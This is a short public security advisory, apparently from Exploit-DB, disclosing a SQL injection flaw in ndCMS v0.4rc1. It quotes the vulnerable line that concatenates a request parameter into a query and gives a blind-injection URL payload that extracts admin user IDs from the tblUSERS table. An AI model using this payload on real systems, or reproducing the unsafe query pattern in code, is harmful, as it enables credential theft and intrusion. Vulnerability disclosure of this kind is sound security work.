ndCMS – SQL Injection

  • 作者: Abysssec
    日期: 2010-09-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15124/
  • '''
    ________ __ ____
     |\/|/ __ \ /\| || |_ \ 
     | \/ | || | /\ | || | |_) |
     | |\/| | || |/ /\ \| || |_ < 
     | || | |__| / ____ \ |__| | |_) |
     |_||_|\____/_/\_\____/|____/ 
    
    http://www.exploit-db.com/moaub-27-ndcms-sql-injection-vulnerability/
    
    '''
    
    
    
    Abysssec Inc Public Advisory
     
     
    Title:ndCMS Sql Injection Vulnerability
    Affected Version :ndCMS(Nickel and Dime CMS) v0.4rc1
    Discovery:www.abysssec.com
    Download Links :http://souurceforge.net/projects/ndcms-net
    Login Page :http://localhost/ndcms/admin/?Mode=Express&indx=
     
    Description :
    ===========================================================================================
    This version of ndCMS has Sql Injection Vulnerability that its DataBase is Access
    withTable of Users : tblUSERS 
     Columns : userid , passwd.
    
    
    Vulnerable Code:
     .../express_edit/editor.aspx
    Ln 65:
     dbr = db.ExecuteReader("Select * from tblPAGES WHERE indx=" + Request.Params["indx"]);
    
     
     Considering to the code, for example you can browse this URL:
     
     http://Example.com/express_edit/editor.aspx?index=1+AND+1=IIF((select mid(last(userid),1,1) from (select top 1 userid from tblUSERS))='a',1,2)
    
     and so on.
     
    
    ===========================================================================================